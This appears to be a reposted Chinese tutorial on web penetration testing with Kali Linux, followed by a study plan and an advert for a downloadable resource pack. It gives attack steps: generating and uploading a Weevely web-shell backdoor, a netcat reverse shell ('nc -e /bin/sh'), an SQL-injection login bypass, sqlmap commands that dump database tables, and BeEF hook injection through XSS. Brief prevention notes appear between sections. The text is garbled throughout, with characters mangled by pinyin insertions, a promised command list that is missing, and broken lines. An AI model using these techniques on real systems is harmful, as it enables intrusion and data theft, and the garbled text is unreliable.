Web滲透:如何使用 Kali Linux 來訪問目標(biāo) PC!什么是 Kali Linux?“Kali Linux 是一個基于 Debian 的 Linux 發(fā)行版,旨在進(jìn)行高級滲透測試和安全審核”。
網(wǎng)絡(luò)信息收集
在Web滲透中,信息就是力量、就是安全。因此,我們總是首先收集盡可能多的有關(guān)目標(biāo)的信息——因為這可能會告訴我們實施攻擊的最佳方式。
一臺計算機(同一IP)上可以安裝多個網(wǎng)站。如果您無法進(jìn)入目標(biāo),請嘗試侵入另一個網(wǎng)站。獲取同一 IP 上的網(wǎng)站(Robtex 除外)的另一種方法是使用 bing 和 search ip。
發(fā)現(xiàn)子域
使用名為“knock”的工具(通常安裝到 Kali 上的 /opt 中)。與 Kali Linux 上的大多數(shù)工具一樣,Knock 是開源的,可以在https://github.com/guelfoweb/knock找到。
git clone <https://github.com/guelfoweb/knock.git>
cd 進(jìn)入文件夾。
python knock.py 目標(biāo)
如果不起作用,嘗試使用 --resolve 運行上述命令,然后再次運行上述命令。
發(fā)現(xiàn)敏感文件
DIRB 是一個 Web 內(nèi)容掃描器,它查找現(xiàn)有(或隱藏)的 Web 對象,在Web滲透中非常有用!DIRB 的工作原理是對 Web 服務(wù)器發(fā)起字典攻擊并分析響應(yīng)(本質(zhì)上只是嘗試不同的文件名并查看是否有響應(yīng))。
dirb [目標(biāo)] [字典] [選項]
- /:通常表示您位于一個目錄中。
- phpinfo.php:非常有用的信息
- robots.txt:管理員不希望我們看到的隱藏信息。
利用服務(wù)器漏洞
利用服務(wù)器漏洞進(jìn)行Web滲透到常見方式,以下是利用 Web 服務(wù)器獲得不同結(jié)果的一系列方法。
利用文件上傳漏洞獲取訪問權(quán)限
Weevely 是一個隱秘的 Web shell,用于模擬類似 telnet 的連接。這可用作后門和/或管理 Web 服務(wù)器上的 Web 帳戶。
創(chuàng)建后門:
weevly generate [密碼] [路徑+文件名]
上傳文件:
weevly [文件地址]- 連接到文件
在嘗試使用工具之前,只需瀏覽網(wǎng)站并感受一下,尋找功能中的漏洞,特別是網(wǎng)站是否允許上傳。
利用代碼執(zhí)行漏洞
始終嘗試您看到的任何輸入框,因為它們正在執(zhí)行命令,您也許可以更改該命令。
可以使用" && “或” ; "在unix中,可以在一行中執(zhí)行多個命令。測試輸入框是否允許這樣做。
大多數(shù)服務(wù)器都有 python 和 netcat。
監(jiān)聽傳入連接,例如使用 netcat:
netcat -vv -l -p [端口]- 偵聽端口 8080 上的連接
IE。nc -e /bin/sh [ip] [端口] - netcat 連接。
下面是您可以執(zhí)行以獲得不同受支持語言的反向連接的命令列表。其中要更改的變量由[HOST_IP]和 表示,可以選擇更改端口。請注意,這些都是“一行代碼”,因此它們可以在輸入框中執(zhí)行。
預(yù)防 Web 服務(wù)器漏洞
發(fā)生上述情況只是因為服務(wù)器允許并且配置錯誤。
-
文件上傳漏洞
- 不允許上傳不安全的文件。
- 如果您要求提供圖像,請確保它是圖像,切勿允許 exe 上傳。
- 檢查文件類型,而不是擴展名。
-
代碼執(zhí)行漏洞
- 不要使用危險的功能,
- 執(zhí)行前過濾輸入
- 如果必須使用函數(shù),請確保在執(zhí)行之前分析輸入。
- 使用正則表達(dá)式(regex)。
-
文件包含漏洞
- 禁用 php 中的allow_url_fopen 和allow_url_include 設(shè)置(在/etc/php5/cgi/php.ini 中)
- 使用靜態(tài)文件包含(對文件進(jìn)行硬編碼)
SQL注入和攻擊
連接到 mySQL 數(shù)據(jù)庫:
mysql -u [用戶名] -h [IP of server]
show 數(shù)據(jù)庫
use [數(shù)據(jù)庫]
show tables
通過注入繞過登錄
另一個巧妙的用途是注入 SQL 查詢,使得查詢最終為SELECT * from accounts where user=‘a(chǎn)dmin’ and password=‘wrong_password’ or 1=1,這可能會以管理員身份登錄我們,而根本不知道密碼,因為如果查詢評估 1 為,則 and 語句中的第二種情況將為 True等于 1。這在Web滲透中有很大的作用。
發(fā)現(xiàn)數(shù)據(jù)檢索 (GET) 中的 SQL 注入
始終嘗試在 php 腳本中注入內(nèi)容(在地址欄中,它看起來像index.php&username=xxxx&password=xxxxx)
在字段后使用 ORDER BY,例如。index.php&username=xxxx’ ORDER BY 1 #&password=xxxxx確保對符號使用 URL 編碼,即。# = %23
按列 100000 排序?qū)⒎祷劐e誤,繼續(xù)按 1,2,3,4,5 進(jìn)行排序。
使用 SQLmap 執(zhí)行上述及更多操作
sqlmap --help
sqlmap -u "[target_url]"
sqlmap -u "[target_url]" --dbs
獲取數(shù)據(jù)庫
sqlmap -u "[target_url]" --current-user
獲取用戶
sqlmap -u "[target_url]" --current-db
當(dāng)前數(shù)據(jù)庫
sqlmap -u "[target_url]" --tables -D [database]
獲取-D數(shù)據(jù)庫中的表
sqlmap -u "[target_url]" --columns -T [table_name] -D [database]
獲取數(shù)據(jù)庫表中的列
sqlmap -u "[target_url]" -T [table_name] -D [database] --dump
獲取數(shù)據(jù)庫表中的所有數(shù)據(jù)
SQL漏洞防范
- 使用過濾器(但可以繞過)
- 使用拒絕列表或允許列表。(但可以繞過)
- 最好的方法是以不允許代碼注入的方式對 Web 應(yīng)用程序進(jìn)行編碼。
- 要執(zhí)行上述操作,您必須使用參數(shù)化語句。(其中數(shù)據(jù)和代碼是分開的)
跨站腳本(XSS)
在瀏覽網(wǎng)站的人而不是服務(wù)器上執(zhí)行。允許將 javascript 注入到頁面上。頁面加載時執(zhí)行代碼。
三個主要類型
- 持久/存儲型 XSS
- 反射型 XSS - 非持久性 XSS。僅當(dāng)目標(biāo)訪問特制的網(wǎng)址時才有效,例如。target.com/page.php?something=alert(‘xss’)
- 基于 DOM 的 XSS
使用參數(shù)(php 的東西)測試文本框和 url。
將牛肉鉤注入易受攻擊的頁面。如果文本區(qū)域有最大長度,請進(jìn)入開發(fā)人員控制臺并檢查元素并更改最大長度。
XSS漏洞防范
- 最小化輸入。
- 將用戶輸入轉(zhuǎn)換為 html 字符符號 so&nsb并使用 代替 & &jsjs;。
- 轉(zhuǎn)義輸入。
- 很少信任瀏覽器內(nèi)的警報!
自動發(fā)現(xiàn)Web漏洞
使用 Zed Attack Proxy (zap) https://owasp.org/www-project-zap/,它已經(jīng)安裝在 Kali 上。
- 在應(yīng)用程序中搜索 ZAP
- 您必須通過 github 獲取此應(yīng)用程序。
- chmod +x [文件名]
- 運行
- 安裝后點擊不再持久。
- 左側(cè)的齒輪圖標(biāo)允許修改選項
- 如果您單擊底部窗口上的綠色加號,則轉(zhuǎn)到活動掃描。然后,您可以在窗口左上角的小面板中更改策略。
- 在自動掃描中添加 url。
- 警報下方的左下角顯示了所有已發(fā)現(xiàn)的漏洞。
- 如果您右鍵單擊其中一個警報(左下角),然后在瀏覽器中打開,它將向您顯示該漏洞及其如何獲取它。
Web滲透歸根結(jié)底還是幾個技術(shù)活,所以要學(xué)習(xí)的東西還是很多的!
接下來我將給各位同學(xué)劃分一張學(xué)習(xí)計劃表!
學(xué)習(xí)計劃
那么問題又來了,作為萌新小白,我應(yīng)該先學(xué)什么,再學(xué)什么?
既然你都問的這么直白了,我就告訴你,零基礎(chǔ)應(yīng)該從什么開始學(xué)起:
階段一:初級網(wǎng)絡(luò)安全工程師
接下來我將給大家安排一個為期1個月的網(wǎng)絡(luò)安全初級計劃,當(dāng)你學(xué)完后,你基本可以從事一份網(wǎng)絡(luò)安全相關(guān)的工作,比如滲透測試、Web滲透、安全服務(wù)、安全分析等崗位;其中,如果你等保模塊學(xué)的好,還可以從事等保工程師。
綜合薪資區(qū)間6k~15k
1、網(wǎng)絡(luò)安全理論知識(2天)
①了解行業(yè)相關(guān)背景,前景,確定發(fā)展方向。
②學(xué)習(xí)網(wǎng)絡(luò)安全相關(guān)法律法規(guī)。
③網(wǎng)絡(luò)安全運營的概念。
④等保簡介、等保規(guī)定、流程和規(guī)范。(非常重要)
2、滲透測試基礎(chǔ)(1周)
①滲透測試的流程、分類、標(biāo)準(zhǔn)
②信息收集技術(shù):主動/被動信息搜集、Nmap工具、Google Hacking
③漏洞掃描、漏洞利用、原理,利用方法、工具(MSF)、繞過IDS和反病毒偵察
④主機攻防演練:MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系統(tǒng)基礎(chǔ)(1周)
①Windows系統(tǒng)常見功能和命令
②Kali Linux系統(tǒng)常見功能和命令
③操作系統(tǒng)安全(系統(tǒng)入侵排查/系統(tǒng)加固基礎(chǔ))
4、計算機網(wǎng)絡(luò)基礎(chǔ)(1周)
①計算機網(wǎng)絡(luò)基礎(chǔ)、協(xié)議和架構(gòu)
②網(wǎng)絡(luò)通信原理、OSI模型、數(shù)據(jù)轉(zhuǎn)發(fā)流程
③常見協(xié)議解析(HTTP、TCP/IP、ARP等)
④網(wǎng)絡(luò)攻擊技術(shù)與網(wǎng)絡(luò)安全防御技術(shù)
⑤Web漏洞原理與防御:主動/被動攻擊、DDOS攻擊、CVE漏洞復(fù)現(xiàn)
5、數(shù)據(jù)庫基礎(chǔ)操作(2天)
①數(shù)據(jù)庫基礎(chǔ)
②SQL語言基礎(chǔ)
③數(shù)據(jù)庫安全加固
6、Web滲透(1周)
①HTML、CSS和JavaScript簡介
②OWASP Top10
③Web漏洞掃描工具
④Web滲透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏掃等)
那么,到此為止,已經(jīng)耗時1個月左右。你已經(jīng)成功成為了一名“腳本小子”。那么你還想接著往下探索嗎?
階段二:中級or高級網(wǎng)絡(luò)安全工程師(看自己能力)
綜合薪資區(qū)間15k~30k
7、腳本編程學(xué)習(xí)(4周)
在網(wǎng)絡(luò)安全領(lǐng)域。是否具備編程能力是“腳本小子”和真正網(wǎng)絡(luò)安全工程師的本質(zhì)區(qū)別。在實際的滲透測試過程中,面對復(fù)雜多變的網(wǎng)絡(luò)環(huán)境,當(dāng)常用工具不能滿足實際需求的時候,往往需要對現(xiàn)有工具進(jìn)行擴展,或者編寫符合我們要求的工具、自動化腳本,這個時候就需要具備一定的編程能力。在分秒必爭的CTF競賽中,想要高效地使用自制的腳本工具來實現(xiàn)各種目的,更是需要擁有編程能力。
零基礎(chǔ)入門的同學(xué),我建議選擇腳本語言Python/PHP/Go/Java中的一種,對常用庫進(jìn)行編程學(xué)習(xí)
搭建開發(fā)環(huán)境和選擇IDE,PHP環(huán)境推薦Wamp和XAMPP,IDE強烈推薦Sublime;
Python編程學(xué)習(xí),學(xué)習(xí)內(nèi)容包含:語法、正則、文件、 網(wǎng)絡(luò)、多線程等常用庫,推薦《Python核心編程》,沒必要看完
用Python編寫漏洞的exp,然后寫一個簡單的網(wǎng)絡(luò)爬蟲
PHP基本語法學(xué)習(xí)并書寫一個簡單的博客系統(tǒng)
熟悉MVC架構(gòu),并試著學(xué)習(xí)一個PHP框架或者Python框架 (可選)
了解Bootstrap的布局或者CSS。
階段三:頂級網(wǎng)絡(luò)安全工程師
如果你對網(wǎng)絡(luò)安全入門感興趣,那么你需要的話可以點擊這里??【整整282G!】網(wǎng)絡(luò)安全&黑客技術(shù)小白到大神全套資料,免費分享!
文章來源:http://www.zghlxwxcb.cn/news/detail-817624.html
學(xué)習(xí)資料分享
當(dāng)然,只給予計劃不給予學(xué)習(xí)資料的行為無異于耍流氓,這里給大家整理了一份【282G】的網(wǎng)絡(luò)安全工程師從入門到精通的學(xué)習(xí)資料包,可點擊下方二維碼鏈接領(lǐng)取哦。文章來源地址http://www.zghlxwxcb.cn/news/detail-817624.html

到了這里,關(guān)于使用 Kali Linux 進(jìn)行 Web 滲透測試的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!